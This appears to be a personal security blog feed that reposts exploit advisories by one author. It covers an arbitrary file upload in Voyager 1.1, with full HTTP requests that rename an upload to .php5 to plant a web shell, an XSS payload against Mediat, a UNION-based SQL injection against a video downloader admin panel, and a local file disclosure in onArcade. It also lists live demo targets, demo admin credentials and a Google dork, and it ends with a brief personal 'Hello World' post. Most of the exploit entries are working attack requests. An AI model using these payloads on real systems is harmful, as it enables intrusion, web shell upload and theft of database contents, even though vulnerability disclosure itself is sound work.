Voyager 1.1 Shell Upload
# Exploit Title: Voyager 1.1 - Arbitrary File Upload
# Google Dork: N/A
# Date: 1 Jan 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Poc Video: https://youtu.be/5GnHbFqRP9M
# Vendor Homepage: https://laravelvoyager.com/
# Software Link: https://github.com/the-control-group/voyager
# Demo Website: http://demo.meteorsa.com/Beemedia
# Demo Admin Panel: http://demo.meteorsa.com/Beemedia/admin
# Demo Admin Credentials:
[email protected]/password
# Version: 1.1.11
# Tested on: WIN7_x68/Linux2.6.32-896.16.1.lve1.4.54.el6.x86_64
# CVE : N/A
# Description
You could be able to bypass .htaccess extensions restrictions by renaming the shell.png to shell.php5,
This exploit happen due to laravel and voyager extensions filter failure.
#Upload Request
POST /Beemedia/admin/media/upload HTTP/1.1
Host: demo.meteorsa.com
Connection: keep-alive
Content-Length: 1203
Accept: application/json
Cache-Control: no-cache
Origin: http://demo.meteorsa.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBfiKW54AxLABftaB
Referer: http://demo.meteorsa.com/Beemedia/admin/media
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: XSRF-TOKEN=eyJpdiI6ImhMWXRCQVwvTVlLbTRkYVFpSzZmYWRBPT0iLCJ2YWx1ZSI6InQxUlFvZWFHeFhPUm02dUxMYzBUaVY4aUFXREZwV3JvQ01rb0VJOFdOQ1wvM2tLdWFLZWVORms1YzMyaU9TUDdDIiwibWFjIjoiMDk5YzNkMmNkZmEyMGJmNGM4Njc0NDg3ZjY3OWIyMzBlMGE3MTFhZDI2OWNhNmZmZWI0MjdiZTdmNDViYzg1MSJ9; laravel_session=eyJpdiI6ImNyc3F6UEJONlhtdHBoQXlxbXdOdlE9PSIsInZhbHVlIjoiU0piSGlGN2tETU1oem9KU3RscVlhb0NIWUxTN01UWjhRMnJ2ZXgwRjZ1dlFMQ1FRVnZiUVh1Q1Q5RUhFXC9PM2siLCJtYWMiOiI2NGE4OWFiNTlhOTQ5MjY1ZmZlZjViMzJhZjI1OTk5MDNhZGI5ZmQ2OGQ4NTJiYWI0ZTE4NmE4MjhlYzUyOGFhIn0%3D
------WebKitFormBoundaryBfiKW54AxLABftaB
Content-Disposition: form-data; name="_token"
of3KiGsiLLx5meVLJLocDCZjj7uZxWGQdG43LCbC
------WebKitFormBoundaryBfiKW54AxLABftaB
Content-Disposition: form-data; name="upload_path"
------WebKitFormBoundaryBfiKW54AxLABftaB
Content-Disposition: form-data; name="file"; filename="wv.png"
Content-Type: image/png
------WebKitFormBoundaryBfiKW54AxLABftaB--
#Rename Request
POST /Beemedia/admin/media/rename_file HTTP/1.1
Host: demo.meteorsa.com
Connection: keep-alive
Content-Length: 157
Accept: */*
Origin: http://demo.meteorsa.com
X-CSRF-TOKEN: of3KiGsiLLx5meVLJLocDCZjj7uZxWGQdG43LCbC
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://demo.meteorsa.com/Beemedia/admin/media
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: XSRF-TOKEN=eyJpdiI6IjU1TXZaVVZoUmFXcFpIcXBWKzE2T2c9PSIsInZhbHVlIjoiV1hLTVwvbk9ZVGRLY3ErUlJoNlwvRlV0TkpIcTJOSFwvQnI2WFltdEFyWTZzZEtRdENreXFLbG1EcFR0WmlONUhkMCIsIm1hYyI6ImM2YzQwZTdiOGYzMDQ1MTE1MjE4MjJhMDkzZTcwYWM1ZmU5ZmY0MmYzZTQ1YjEwODZlOGIzMjA3ZTE4ODZkOGIifQ%3D%3D; laravel_session=eyJpdiI6IksyS2xBczMrdlJ4SHdtVDN0QWhLR1E9PSIsInZhbHVlIjoiNHZvU0wzeEF5MkpcLzlONEFvN09XMXlZSkljbDFJVHo0aE81aGtOSm1QaHBZUmpZaHNndmJmeUZqVFdtS1lycHMiLCJtYWMiOiIzZWI5YjNhOGFkNWU4YjdiZjNkM2FhMDFlODY4MjkyMDk3NjdlZTQ4YjMwYjE1MTEyZDM3YzU1NzAyYjNlYTEyIn0%3D
filename=LWVxh2eHAtZYxigmkPVzSeB5YdclRG5ogwqEp0lA.&new_filename=LWVxh2eHAtZYxigmkPVzSeB5YdclRG5ogwqEp0lA.php5&_token=of3KiGsiLLx5meVLJLocDCZjj7uZxWGQdG43LCbC
#References:
https://packetstormsecurity.com/files/150963/Voyager-1.1-Shell-Upload.html
0 notes
Mediat 1.4.1 - Cross-site Scripting
# Exploit Title: Mediat 1.4.1 - Cross-site Script
# Google Dork: N/A
# Date: 1 Jan 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: http://webfairy.net/
# Software Link: https://github.com/WebFairyNet/Mediat
# Demo Website: http://mediat.webfairy.net/
# Version: 1.4
# Tested on: WIN7_x68/Linux
# CVE : N/A
# Description:
A XSS found in "WebFairy Mediat 1.4.1" search section.
# POC Request:
http://[PATH]/search.html?query="><script>alert('Deyaa')</script>
#Live Target:
http://mediat.webfairy.net/arabic_demo/search.html?query="><script>alert('Deyaa')</script>
References:
https://packetstormsecurity.com/files/150962/WebFairy-Mediat-1.4.1-Cross-Site-Scripting.html
0 notes
All in One Video Downloader 1.2 - SQL Injection
# Exploit Title: All in One Video Downloader 1.2 - SQL Injection
# Google Dork: "developed by Niche Office"
# Date: 1 Jan 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: https://nicheoffice.web.tr/
# Software Link: https://codecanyon.net/item/all-in-one-video-downloader-youtube-and-more/22599418
# Demo Website: https://aiovideodl.ml/
# Demo Admin Panel: https://aiovideodl.ml/admin/
# Demo Admin Credentials:
[email protected]/123456
# Version: 1.2
# Tested on: WIN7_x68/cloudflare
# CVE : N/A
# POC:
https://[PATH]/admin/?view=page-edit&id=2.9'+[SQLI]-- -
# Exploit:
https://[PATH]/admin/?view=page-edit&id=2.9'+UNION+SELECT+1,2,3,4,concat(user(),0x3a3a,database(),0x3a3a,version())-- -
#Live Target:
https://aiovideodl.ml/admin/?view=page-edit&id=2.9'+UNION+SELECT+1,2,3,4,concat(user(),0x3a3a,database(),0x3a3a,version())-- -
# References:
https://packetstormsecurity.com/files/150955/All-In-One-Video-Downloader-1.2-SQL-Injection.html
0 notes
onArcade 2.4.x Local File Disclosure
[1] INTRO
onArcade is a nice PHP CMS Software that handle videos and online games content,there is no enough filtering for template file handler, which leads to a Local File Disclosure vulnerability.
[2] Vulnerable Versions
onArcade 2.4.2
onArcade 2.4.1
onArcade 2.4.0
[3] Bug Track
Because of the special treatment for .php extension, we wont be able to read the files with php extension
But , you may use Null-Byte to bypass this problem and "drop" the extension in file path when PHP <= 5.3.4.
[4] POC Video
[5] Links
https://packetstormsecurity.com/files/141792/onArcade-2.4.x-Local-File-Disclosure.html
http://0day.today/exploit/description/27410
0 notes
Using Cisco Packet Tracer under Ubuntu
0 notes
Hello World
Hello world,
In my short life, I've gain skills take and left a lot of hobbies.
I have never been interested in blogging, internet communities.
I always saw it as the more you are obvious on the internet the more people can break into your life and privacy easily.
Finally I've realized
Blogging and sharing your thought over internet maybe not that bad, due to the fact that i like computers more than people so i think it’s better to share your thoughts with people over computers.
0 notes